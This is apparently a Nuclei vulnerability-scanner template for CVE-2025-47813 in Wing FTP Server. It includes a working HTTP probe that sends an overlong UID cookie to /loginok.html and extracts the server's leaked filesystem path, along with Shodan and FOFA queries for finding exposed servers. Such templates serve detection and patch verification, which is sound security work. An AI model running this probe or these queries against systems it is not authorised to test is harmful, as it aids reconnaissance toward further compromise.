id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  impact: |
    Authenticated attackers can supply an overlong UID cookie value to trigger error responses that disclose the full local filesystem path, aiding in further exploitation attempts.
  remediation: |
    Upgrade Wing FTP Server to version 7.4.4 or later that properly validates UID cookie values.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.26923
    epss-percentile: 0.96461
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure,vuln,kev,vkev

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'
# digest: 490a00463044022100e9328353210b5257e065057f275f4d798989aa2e7003d252ab3a2b264d82928b021f4a3940583661bb504a0df12dac0de9fffd398380746f484d17b7e2f6b1ed6c:922c64590222798bb761d5b6d8e72950